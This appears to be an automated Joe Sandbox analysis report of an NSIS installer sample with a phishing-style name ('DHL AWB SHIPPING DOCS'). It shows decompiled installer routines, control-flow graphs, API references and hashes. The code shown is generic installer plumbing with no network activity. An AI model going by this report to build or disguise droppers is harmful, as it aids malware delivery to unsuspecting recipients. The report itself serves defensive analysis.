                        control_flow_graph 579 403479-4034a1 GetTickCount 580 4035d1-4035d9 call 40302e 579->580 581 4034a7-4034d2 call 4035f8 SetFilePointer 579->581 586 4035db-4035df 580->586 587 4034d7-4034e9 581->587 588 4034eb 587->588 589 4034ed-4034fb call 4035e2 587->589 588->589 592 403501-40350d 589->592 593 4035c3-4035c6 589->593 594 403513-403519 592->594 593->586 595 403544-403560 call 406bb0 594->595 596 40351b-403521 594->596 602 403562-40356a 595->602 603 4035cc 595->603 596->595 597 403523-403543 call 40302e 596->597 597->595 605 40356c-403574 call 40620a 602->605 606 40358d-403593 602->606 604 4035ce-4035cf 603->604 604->586 610 403579-40357b 605->610 606->603 607 403595-403597 606->607 607->603 609 403599-4035ac 607->609 609->587 611 4035b2-4035c1 SetFilePointer 609->611 612 4035c8-4035ca 610->612 613 40357d-403589 610->613 611->580 612->604 613->594 614 40358b 613->614 614->609
                        C-Code - Quality: 93%
                        			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40facf
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}














                        0x00403489
                        0x0040349c
                        0x004034a1
                        0x004035d1
                        0x004035d3
                        0x00000000
                        0x004035d9
                        0x004034ad
                        0x004034c0
                        0x004034c6
                        0x004034cc
                        0x004034d7
                        0x004034dc
                        0x004034e1
                        0x004034e9
                        0x004034eb
                        0x004034eb
                        0x004034f4
                        0x004034fb
                        0x00000000
                        0x00000000
                        0x00403501
                        0x00403507
                        0x0040350d
                        0x00000000
                        0x00403513
                        0x00403519
                        0x00403539
                        0x0040353e
                        0x00403543
                        0x00403549
                        0x0040354f
                        0x00403559
                        0x00403560
                        0x00000000
                        0x00000000
                        0x00403562
                        0x00403568
                        0x0040356a
                        0x0040358d
                        0x00403593
                        0x00000000
                        0x00000000
                        0x00403595
                        0x00403597
                        0x00000000
                        0x00000000
                        0x00403599
                        0x00403599
                        0x004035ac
                        0x00000000
                        0x00000000
                        0x004035bb
                        0x00000000
                        0x004035bb
                        0x00403574
                        0x0040357b
                        0x004035c8
                        0x004035ce
                        0x004035ce
                        0x00000000
                        0x004035ce
                        0x0040357d
                        0x00403583
                        0x00403589
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004035cc
                        0x004035cc
                        0x00000000
                        0x004035cc
                        0x00000000

                        APIs
                        • GetTickCount.KERNEL32 ref: 0040348D
                          • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: FilePointer$CountTick
                        • String ID: codeIncrementalHandleCreate
                        • API String ID: 1092082344-1664959861
                        • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                        • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                        • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                        • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 615 406187-406193 616 406194-4061c8 GetTickCount GetTempFileNameW 615->616 617 4061d7-4061d9 616->617 618 4061ca-4061cc 616->618 620 4061d1-4061d4 617->620 618->616 619 4061ce 618->619 619->620
                        C-Code - Quality: 100%
                        			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                        0x0040618d
                        0x00406193
                        0x00406194
                        0x00406194
                        0x00406199
                        0x0040619a
                        0x0040619d
                        0x004061a2
                        0x004061a5
                        0x004061af
                        0x004061bc
                        0x004061c0
                        0x004061c8
                        0x00000000
                        0x00000000
                        0x004061cc
                        0x00000000
                        0x004061ce
                        0x004061ce
                        0x004061ce
                        0x004061d1
                        0x004061d4
                        0x004061d4
                        0x004061d7
                        0x00000000

                        APIs
                        • GetTickCount.KERNEL32 ref: 004061A5
                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CountFileNameTempTick
                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                        • API String ID: 1716503409-1968954121
                        • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                        • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                        • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                        • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 621 403c25-403c34 622 403c40-403c48 621->622 623 403c36-403c39 CloseHandle 621->623 624 403c54-403c60 call 403c82 call 405d74 622->624 625 403c4a-403c4d CloseHandle 622->625 623->622 629 403c65-403c66 624->629 625->624
                        C-Code - Quality: 100%
                        			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nsl9995.tmp\\", 7); // executed
				return _t4;
			}







                        0x00403c25
                        0x00403c34
                        0x00403c37
                        0x00403c39
                        0x00403c39
                        0x00403c40
                        0x00403c48
                        0x00403c4b
                        0x00403c4d
                        0x00403c4d
                        0x00403c4d
                        0x00403c54
                        0x00403c60
                        0x00403c66

                        APIs
                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                        Strings
                        • C:\Users\user\AppData\Local\Temp\nsl9995.tmp\, xrefs: 00403C5B
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsl9995.tmp\
                        • API String ID: 2962429428-2482436076
                        • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                        • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                        • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                        • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 713 4015c1-4015d5 call 402da6 call 405fe2 718 401631-401634 713->718 719 4015d7-4015ea call 405f64 713->719 720 401663-4022f6 call 401423 718->720 721 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 718->721 726 401604-401607 call 405c16 719->726 727 4015ec-4015ef 719->727 737 402c2a-402c39 720->737 738 40292e-402935 720->738 721->737 740 40165b-40165e 721->740 736 40160c-40160e 726->736 727->726 730 4015f1-4015f8 call 405c33 727->730 730->726 744 4015fa-4015fd call 405b99 730->744 742 401610-401615 736->742 743 401627-40162f 736->743 738->737 740->737 746 401624 742->746 747 401617-401622 GetFileAttributesW 742->747 743->718 743->719 749 401602 744->749 746->743 747->743 747->746 749->736
                        C-Code - Quality: 86%
                        			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                        0x004015c1
                        0x004015c9
                        0x004015cc
                        0x004015d1
                        0x004015d5
                        0x004015d7
                        0x004015df
                        0x004015e1
                        0x004015e4
                        0x004015ea
                        0x00401604
                        0x00401607
                        0x004015ec
                        0x004015ec
                        0x004015ef
                        0x00000000
                        0x004015fa
                        0x004015fd
                        0x004015fd
                        0x004015ef
                        0x0040160e
                        0x00401615
                        0x00401624
                        0x00401624
                        0x00401617
                        0x0040161a
                        0x00401622
                        0x00000000
                        0x00000000
                        0x00401622
                        0x00401615
                        0x00401627
                        0x0040162b
                        0x0040162c
                        0x004015d7
                        0x00401634
                        0x00401663
                        0x004022f1
                        0x00401636
                        0x00401638
                        0x00401645
                        0x0040164d
                        0x00401655
                        0x0040165b
                        0x0040165b
                        0x00401655
                        0x00402c2d
                        0x00402c39

                        APIs
                          • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                          • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 1892508949-501415292
                        • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                        • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                        • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                        • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 750 40603f-40605a call 406668 call 405fe2 755 406060-40606d call 4068ef 750->755 756 40605c-40605e 750->756 760 40607d-406081 755->760 761 40606f-406075 755->761 757 4060b8-4060ba 756->757 763 406097-4060a0 lstrlenW 760->763 761->756 762 406077-40607b 761->762 762->756 762->760 764 4060a2-4060b6 call 405f37 GetFileAttributesW 763->764 765 406083-40608a call 40699e 763->765 764->757 770 406091-406092 call 405f83 765->770 771 40608c-40608f 765->771 770->763 771->756 771->770
                        C-Code - Quality: 53%
                        			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                        0x0040604b
                        0x00406056
                        0x0040605a
                        0x00406061
                        0x0040606d
                        0x0040607d
                        0x0040607f
                        0x00406097
                        0x00406098
                        0x0040609f
                        0x004060a0
                        0x00000000
                        0x00000000
                        0x00406083
                        0x0040608a
                        0x00406092
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040608a
                        0x004060a2
                        0x004060a8
                        0x00000000
                        0x004060b6
                        0x0040606f
                        0x00406075
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406075
                        0x0040605c
                        0x00000000

                        APIs
                          • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                          • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                        • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00406098
                        • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004060A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                        • String ID: P_B
                        • API String ID: 3248276644-906794629
                        • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                        • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                        • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                        • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                        Download Yara Rule
                        C-Code - Quality: 99%
                        			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
